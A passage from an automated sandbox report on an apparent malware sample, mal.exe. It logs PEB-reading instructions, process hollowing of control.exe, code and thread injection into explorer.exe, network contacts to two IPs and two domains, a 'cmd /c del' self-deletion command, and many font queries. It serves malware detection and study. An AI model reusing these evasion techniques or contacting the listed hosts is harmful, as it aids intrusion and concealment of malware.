          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04593A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04575210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04588A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04645BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04581B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04581B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0462D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\mal.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\mal.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.99.64.55 80
          Source: C:\Windows\explorer.exeDomain query: www.mybabytennis.com
          Source: C:\Windows\explorer.exeDomain query: www.sarahcarver.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\mal.exeMemory written: C:\Users\user\Desktop\mal.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\mal.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\mal.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\mal.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\mal.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\mal.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\mal.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 110000
          Source: C:\Users\user\Desktop\mal.exeProcess created: C:\Users\user\Desktop\mal.exe C:\Users\user\Desktop\mal.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mal.exe'
          Source: explorer.exe, 00000003.00000000.254840052.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000000.255111932.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.267754252.0000000006860000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.255111932.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.255111932.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Users\user\Desktop\mal.exe VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
